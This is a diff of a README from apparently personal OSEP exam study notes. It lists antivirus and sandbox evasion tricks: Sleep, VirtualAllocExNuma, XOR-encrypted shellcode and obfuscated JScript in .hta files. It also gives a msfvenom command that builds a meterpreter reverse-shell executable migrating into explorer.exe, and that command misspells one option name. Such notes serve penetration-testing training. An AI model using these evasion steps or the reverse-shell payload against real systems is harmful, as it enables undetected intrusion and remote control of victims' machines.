OoStellarnightoO/OSEP_Notes/00 - OSEP Checklist/README.md

 - if you are creating an .exe payload from csharp, use Sleep, non-emulated APIs (such as VirtualAllocExNuma) for sandbox evasion, use multiple byte XOR to encrypt your payload
 - same idea for VBA
 - for .hta code, it is jscript; XOR the shellcode, do dotnet2js, prepend an obfuscated jscript into the output .hta file from dotnet2js
-- for prependmigrate, you need to set it up as a msfvenom option when creating a payload.
+- for prependmigrate, you can set it up as a msfvenom option when creating a payload.
 Note that explorer may not always work if the target user is not an interactive user (such as svc accounts, IIS blah blah)
 ```
 msfvenom -p windows/meterpreter/reverse_tcp lhost=<kali ip> lport=443 prpendmigrateprocess=explorer.exe prependmigrate=true -f exe > evil.exe
 ```